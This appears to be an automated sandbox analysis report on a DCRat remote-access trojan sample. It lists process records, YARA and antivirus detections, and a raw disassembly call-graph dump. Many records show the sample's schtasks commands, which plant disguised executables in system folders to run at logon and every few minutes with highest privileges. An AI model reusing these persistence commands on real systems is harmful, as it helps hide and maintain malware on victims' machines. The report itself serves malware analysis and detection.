                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:8
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:9
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:10
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:11
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:12
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:13
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:14
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 9 /tr "'C:\Users\user\OjTEkrTlLyhdt.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:15
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Users\user\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:16
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 9 /tr "'C:\Users\user\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:17
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 5 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:18
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Program Files\Windows Portable Devices\Idle.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Windows Portable Devices\Idle.exe"
                Imagebase:0x7d0000
                File size:1'344'000 bytes
                MD5 hash:889D38A4230664BEFDBB3D1528E08DF2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000012.00000002.1838389619.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 76%, ReversingLabs
                Has exited:true

                General

                Target ID:19
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:20
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 12 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:21
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Program Files\Windows Portable Devices\Idle.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Windows Portable Devices\Idle.exe"
                Imagebase:0x180000
                File size:1'344'000 bytes
                MD5 hash:889D38A4230664BEFDBB3D1528E08DF2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.1857787065.0000000002611000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Has exited:true

                General

                Target ID:22
                Start time:12:32:03
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:23
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe
                Wow64 process (32bit):false
                Commandline:C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe
                Imagebase:0x4e0000
                File size:1'344'000 bytes
                MD5 hash:889D38A4230664BEFDBB3D1528E08DF2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.1838727941.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 76%, ReversingLabs
                Has exited:true

                General

                Target ID:24
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:25
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:26
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe
                Wow64 process (32bit):false
                Commandline:C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe
                Imagebase:0xf80000
                File size:1'344'000 bytes
                MD5 hash:889D38A4230664BEFDBB3D1528E08DF2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.1838303042.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Has exited:true

                General

                Target ID:27
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 8 /tr "'C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:28
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:29
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 12 /tr "'C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:30
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Portable Devices\upfc.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:31
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\upfc.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:32
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Portable Devices\upfc.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:33
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:34
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:35
                Start time:12:32:04
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:36
                Start time:12:32:05
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 5 /tr "'C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:37
                Start time:12:32:05
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:38
                Start time:12:32:05
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 11 /tr "'C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:39
                Start time:12:32:05
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft office\dasHost.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:40
                Start time:12:32:05
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "dasHost" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft office\dasHost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:41
                Start time:12:32:05
                Start date:27/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft office\dasHost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:42
                Start time:12:32:05
                Start date:27/12/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\GoElC7XtGN.bat"
                Imagebase:0x7ff70aac0000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:43
                Start time:12:32:05
                Start date:27/12/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:9.8%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:9.3%
                  Total number of Nodes:1498
                  Total number of Limit Nodes:26
                  execution_graph 24832 18be49 108 API calls 4 library calls 22854 18dc1f 22855 18dbcd 22854->22855 22857 18df59 22855->22857 22885 18dc67 22857->22885 22859 18df73 22860 18dfd0 22859->22860 22874 18dff4 22859->22874 22861 18ded7 DloadReleaseSectionWriteAccess 11 API calls 22860->22861 22862 18dfdb RaiseException 22861->22862 22863 18e1c9 22862->22863 22904 18ec4a 22863->22904 22864 18e0df 22870 18e19b 22864->22870 22873 18e13d GetProcAddress 22864->22873 22865 18e06c LoadLibraryExA 22867 18e0cd 22865->22867 22868 18e07f GetLastError 22865->22868 22867->22864 22871 18e0d8 FreeLibrary 22867->22871 22872 18e0a8 22868->22872 22882 18e092 22868->22882 22869 18e1d8 22869->22855 22896 18ded7 22870->22896 22871->22864 22876 18ded7 DloadReleaseSectionWriteAccess 11 API calls 22872->22876 22873->22870 22875 18e14d GetLastError 22873->22875 22874->22864 22874->22865 22874->22867 22874->22870 22880 18e160 22875->22880 22878 18e0b3 RaiseException 22876->22878 22878->22863 22879 18ded7 DloadReleaseSectionWriteAccess 11 API calls 22881 18e181 RaiseException 22879->22881 22880->22870 22880->22879 22883 18dc67 ___delayLoadHelper2@8 11 API calls 22881->22883 22882->22867 22882->22872 22884 18e198 22883->22884 22884->22870 22886 18dc99 22885->22886 22887 18dc73 22885->22887 22886->22859 22911 18dd15 22887->22911 22890 18dc94 22921 18dc9a 22890->22921 22893 18df24 22894 18ec4a TranslatorGuardHandler 5 API calls 22893->22894 22895 18df55 22894->22895 22895->22859 22897 18dee9 22896->22897 22898 18df0b 22896->22898 22899 18dd15 DloadLock 8 API calls 22897->22899 22898->22863 22900 18deee 22899->22900 22901 18df06 22900->22901 22902 18de67 DloadProtectSection 3 API calls 22900->22902 22930 18df0f 8 API calls 2 library calls 22901->22930 22902->22901 22905 18ec53 22904->22905 22906 18ec55 IsProcessorFeaturePresent 22904->22906 22905->22869 22908 18f267 22906->22908 22931 18f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22908->22931 22910 18f34a 22910->22869 22912 18dc9a DloadLock 3 API calls 22911->22912 22913 18dd2a 22912->22913 22914 18ec4a TranslatorGuardHandler 5 API calls 22913->22914 22915 18dc78 22914->22915 22915->22890 22916 18de67 22915->22916 22918 18de7c DloadObtainSection 22916->22918 22917 18de82 22917->22890 22918->22917 22919 18deb7 VirtualProtect 22918->22919 22929 18dd72 VirtualQuery GetSystemInfo 22918->22929 22919->22917 22922 18dcab 22921->22922 22923 18dca7 22921->22923 22924 18dcaf 22922->22924 22925 18dcb3 GetModuleHandleW 22922->22925 22923->22893 22924->22893 22926 18dcc9 GetProcAddress 22925->22926 22928 18dcc5 22925->22928 22927 18dcd9 GetProcAddress 22926->22927 22926->22928 22927->22928 22928->22893 22929->22919 22930->22898 22931->22910 24833 176110 80 API calls 24834 19b710 GetProcessHeap 24836 171f05 126 API calls __EH_prolog 24780 18ec0b 28 API calls 2 library calls 24838 18db0b 19 API calls ___delayLoadHelper2@8 22942 18c40e 22943 18c4c7 22942->22943 22951 18c42c _wcschr 22942->22951 22944 18c4e5 22943->22944 22955 18be49 _wcsrchr 22943->22955 22997 18ce22 22943->22997 22947 18ce22 18 API calls 22944->22947 22944->22955 22947->22955 22948 18ca8d 22950 1817ac CompareStringW 22950->22951 22951->22943 22951->22950 22952 18c11d SetWindowTextW 22952->22955 22955->22948 22955->22952 22958 18bf0b SetFileAttributesW 22955->22958 22963 18c2e7 GetDlgItem SetWindowTextW SendMessageW 22955->22963 22967 18c327 SendMessageW 22955->22967 22971 1817ac CompareStringW 22955->22971 22972 18aa36 22955->22972 22976 189da4 GetCurrentDirectoryW 22955->22976 22981 17a52a 7 API calls 22955->22981 22982 17a4b3 FindClose 22955->22982 22983 18ab9a 76 API calls ___std_exception_copy 22955->22983 22984 1935de 22955->22984 22959 18bfc5 GetFileAttributesW 22958->22959 22970 18bf25 ___scrt_get_show_window_mode 22958->22970 22959->22955 22962 18bfd7 DeleteFileW 22959->22962 22962->22955 22964 18bfe8 22962->22964 22963->22955 22978 17400a 22964->22978 22967->22955 22968 18c01d MoveFileW 22968->22955 22969 18c035 MoveFileExW 22968->22969 22969->22955 22970->22955 22970->22959 22977 17b4f7 52 API calls 2 library calls 22970->22977 22971->22955 22973 18aa40 22972->22973 22974 18ab16 22973->22974 22975 18aaf3 ExpandEnvironmentStringsW 22973->22975 22974->22955 22975->22974 22976->22955 22977->22970 23020 173fdd 22978->23020 22981->22955 22982->22955 22983->22955 22985 198606 22984->22985 22986 19861e 22985->22986 22987 198613 22985->22987 22989 198626 22986->22989 22995 19862f _free 22986->22995 23099 198518 22987->23099 22990 1984de _free 20 API calls 22989->22990 22993 19861b 22990->22993 22991 198659 RtlReAllocateHeap 22991->22993 22991->22995 22992 198634 23106 19895a 20 API calls _free 22992->23106 22993->22955 22995->22991 22995->22992 23107 1971ad 7 API calls 2 library calls 22995->23107 22999 18ce2c ___scrt_get_show_window_mode 22997->22999 22998 18d08a 22998->22944 22999->22998 23000 18cf1b 22999->23000 23113 1817ac CompareStringW 22999->23113 23110 17a180 23000->23110 23004 18cf4f ShellExecuteExW 23004->22998 23011 18cf62 23004->23011 23006 18cf47 23006->23004 23007 18cf9b 23115 18d2e6 6 API calls 23007->23115 23008 18cff1 CloseHandle 23009 18d00a 23008->23009 23010 18cfff 23008->23010 23009->22998 23016 18d081 ShowWindow 23009->23016 23116 1817ac CompareStringW 23010->23116 23011->23007 23011->23008 23013 18cf91 ShowWindow 23011->23013 23013->23007 23015 18cfb3 23015->23008 23017 18cfc6 GetExitCodeProcess 23015->23017 23016->22998 23017->23008 23018 18cfd9 23017->23018 23018->23008 23021 173ff4 __vsnwprintf_l 23020->23021 23024 195759 23021->23024 23027 193837 23024->23027 23028 19385f 23027->23028 23029 193877 23027->23029 23044 19895a 20 API calls _free 23028->23044 23029->23028 23031 19387f 23029->23031 23046 193dd6 23031->23046 23032 193864 23045 198839 26 API calls pre_c_initialization 23032->23045 23037 18ec4a TranslatorGuardHandler 5 API calls 23039 173ffe GetFileAttributesW 23037->23039 23038 193907 23055 194186 51 API calls 4 library calls 23038->23055 23039->22964 23039->22968 23042 19386f 23042->23037 23043 193912 23056 193e59 20 API calls _free 23043->23056 23044->23032 23045->23042 23047 19388f 23046->23047 23048 193df3 23046->23048 23054 193da1 20 API calls 2 library calls 23047->23054 23048->23047 23057 198fa5 GetLastError 23048->23057 23050 193e14 23077 1990fa 38 API calls __cftof 23050->23077 23052 193e2d 23078 199127 38 API calls __cftof 23052->23078 23054->23038 23055->23043 23056->23042 23058 198fbb 23057->23058 23059 198fc1 23057->23059 23079 19a61b 11 API calls 2 library calls 23058->23079 23063 199010 SetLastError 23059->23063 23080 1985a9 23059->23080 23063->23050 23064 198fdb 23087 1984de 23064->23087 23067 198ff0 23067->23064 23069 198ff7 23067->23069 23068 198fe1 23070 19901c SetLastError 23068->23070 23094 198e16 20 API calls _free 23069->23094 23095 198566 38 API calls _abort 23070->23095 23072 199002 23074 1984de _free 20 API calls 23072->23074 23076 199009 23074->23076 23076->23063 23076->23070 23077->23052 23078->23047 23079->23059 23085 1985b6 _free 23080->23085 23081 1985f6 23097 19895a 20 API calls _free 23081->23097 23082 1985e1 RtlAllocateHeap 23083 1985f4 23082->23083 23082->23085 23083->23064 23093 19a671 11 API calls 2 library calls 23083->23093 23085->23081 23085->23082 23096 1971ad 7 API calls 2 library calls 23085->23096 23088 1984e9 RtlFreeHeap 23087->23088 23089 198512 _free 23087->23089 23088->23089 23090 1984fe 23088->23090 23089->23068 23098 19895a 20 API calls _free 23090->23098 23092 198504 GetLastError 23092->23089 23093->23067 23094->23072 23096->23085 23097->23083 23098->23092 23100 198556 23099->23100 23104 198526 _free 23099->23104 23109 19895a 20 API calls _free 23100->23109 23102 198541 RtlAllocateHeap 23103 198554 23102->23103 23102->23104 23103->22993 23104->23100 23104->23102 23108 1971ad 7 API calls 2 library calls 23104->23108 23106->22993 23107->22995 23108->23104 23109->23103 23117 17a194 23110->23117 23113->23000 23114 17b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23114->23006 23115->23015 23116->23009 23125 18e360 23117->23125 23120 17a1b2 23127 17b66c 23120->23127 23121 17a189 23121->23004 23121->23114 23123 17a1c6 23123->23121 23124 17a1ca GetFileAttributesW 23123->23124 23124->23121 23126 17a1a1 GetFileAttributesW 23125->23126 23126->23120 23126->23121 23128 17b679 23127->23128 23136 17b683 23128->23136 23137 17b806 CharUpperW 23128->23137 23130 17b692 23138 17b832 CharUpperW 23130->23138 23132 17b6a1 23133 17b6a5 23132->23133 23134 17b71c GetCurrentDirectoryW 23132->23134 23139 17b806 CharUpperW 23133->23139 23134->23136 23136->23123 23137->23130 23138->23132 23139->23136 24781 18ea00 46 API calls 6 library calls 23146 19b731 31 API calls TranslatorGuardHandler 24782 18a430 73 API calls 24841 18be49 103 API calls 4 library calls 24783 171025 29 API calls pre_c_initialization 23195 179f2f 23196 179f44 23195->23196 23197 179f3d 23195->23197 23198 179f4a GetStdHandle 23196->23198 23205 179f55 23196->23205 23198->23205 23199 179fa9 WriteFile 23199->23205 23200 179f7c WriteFile 23201 179f7a 23200->23201 23200->23205 23201->23200 23201->23205 23203 17a031 23207 177061 75 API calls 23203->23207 23205->23197 23205->23199 23205->23200 23205->23201 23205->23203 23206 176e18 60 API calls 23205->23206 23206->23205 23207->23197 24845 189b50 GdipDisposeImage GdipFree __except_handler4 24785 198050 8 API calls ___vcrt_uninitialize 23947 179b59 23948 179bd7 23947->23948 23951 179b63 23947->23951 23949 179bad SetFilePointer 23949->23948 23950 179bcd GetLastError 23949->23950 23950->23948 23951->23949 24847 18d34e DialogBoxParamW 24787 18ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24788 188c40 GetClientRect 24789 193040 5 API calls 2 library calls 24848 18be49 98 API calls 3 library calls 24790 1a0040 IsProcessorFeaturePresent 24791 171075 82 API calls 